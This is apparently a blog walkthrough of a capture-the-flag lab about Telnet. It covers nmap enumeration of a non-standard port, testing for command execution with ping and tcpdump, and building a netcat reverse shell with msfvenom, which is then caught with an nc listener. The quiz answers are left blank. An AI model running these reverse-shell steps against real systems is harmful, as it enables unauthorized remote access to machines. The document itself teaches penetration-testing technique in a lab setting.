What is Telnet?

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

We've already seen how key enumeration can be in exploiting a misconfigured network service. However, vulnerabilities that could be potentially trivial to exploit don't always jump out at us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method.

Let's start out the same way we usually do, a port scan, to find out as much information as we can about the services, applications, structure and operating system of the target machine. Scan the machine with nmap and the tag -A and -p-.


Tag

-A : Enables OS Detection, Version Detection, Script Scanning and Traceroute all in one

-p- : Enables scanning across all ports, not just the top 1000


Output

Let's see what's going on on the target server...


#1 How many ports are open on the target machine?   



#2 What port is this?



#3 This port is unassigned, but still lists the protocol it's using, what protocol is this?    



#4 Now re-run the nmap scan, without the -p- tag, how many ports show up as open?



#5 Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.




#6 Based on the title returned to us, what do we think this port could be used for?



#7 Who could it belong to? Gathering possible usernames is an important step in enumeration.



#8 Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE's for Telnet client and server systems, however, so when exploiting you can check for those on:

A CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they usually mean the CVE ID number assigned to a security flaw.


However, you're far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it.




Method Breakdown


So, from our enumeration stage, we know:

Using this information, let's try accessing this telnet port, and using that as a foothold to get a full reverse shell on the machine!



Connecting to Telnet

You can connect to a telnet server with the following syntax:

"telnet [ip] [port]"

We're going to need to keep this in mind as we try and exploit this machine.

A "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device.
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.


The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.




#1 Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.



#2 Great! It's an open telnet connection! What welcome message do we receive?



#3 Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)



#4 Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.



#5 Start a tcpdump listener on your local machine using: "sudo tcpdump ip proto \\icmp -i tun0" This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.



#6 Now, use the command "ping [local tun0 ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)



#7 Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!



#8 We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:
"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

What word does the generated payload start with?



#9 Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

"nc -lvp [listening port]"

What would the command look like for the listening port we selected in our payload?




#10 Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!



#11 Success! What is the contents of flag.txt?


I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)